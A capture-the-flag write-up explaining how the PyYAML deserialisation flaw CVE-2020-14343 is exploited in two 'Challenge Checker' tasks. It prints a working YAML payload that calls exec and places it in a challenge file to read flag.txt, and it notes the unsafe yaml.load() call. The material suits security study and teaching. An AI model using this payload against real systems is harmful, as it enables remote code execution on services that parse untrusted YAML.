Challenge Checker
PyYAML deserialisation vulnerability (CVE-2020-14343).
Challenge Checker 1
We are prompted to paste in YAML data. We can see from the code that
yaml.load() is used to load the data.1
from yaml import load
2
β
3
...
4
β
5
def check(raw_data) -> "Tuple[list[str], list[str]]":
6
data = load(raw_data)
Copied!
There exists a deserialization exploit in PyYAML that was only fixed in version 5.4.1.
Issue: https://github.com/yaml/pyyaml/issues/420 GitHub Advisory (CVE-2020-14343): https://github.com/advisories/GHSA-8q59-q68h-6hv4β
We can see from
requirements.txt that the version is 3.13, which is vulnerable.1
PyYAML==3.13
2
termcolor==1.1.0
Copied!
From the GitHub issue, we can find some of the proof of concept exploits. For instance:
1
- !!python/object/new:str
2
args: []
3
state: !!python/tuple
4
- "RCE_HERE"
5
- !!python/object/new:staticmethod
6
args: [0]
7
state:
8
update: !!python/name:exec
Copied!
So, in the
chall.yaml, I simply added this PoC under authors:1
authors:
2
- anli
3
- Edward Feng
4
- !!python/object/new:str
5
args: []
6
state: !!python/tuple
7
- "print(open('flag.txt').read())"
8
- !!python/object/new:staticmethod
9
args: [0]
10
state:
11
update: !!python/name:exec
12
visible: true
Copied!
This executes
print(open('flag.txt').read()) and reads the flag.
Challenge Checker 2
The only change is that PyYAML is now version 5.3.1.
1
PyYAML==5.3.1
2
termcolor==1.1.0
Copied!
But the exploit we used previously affected all versions below 5.4.1, so it works here too.
Last modified 1mo ago
Copy link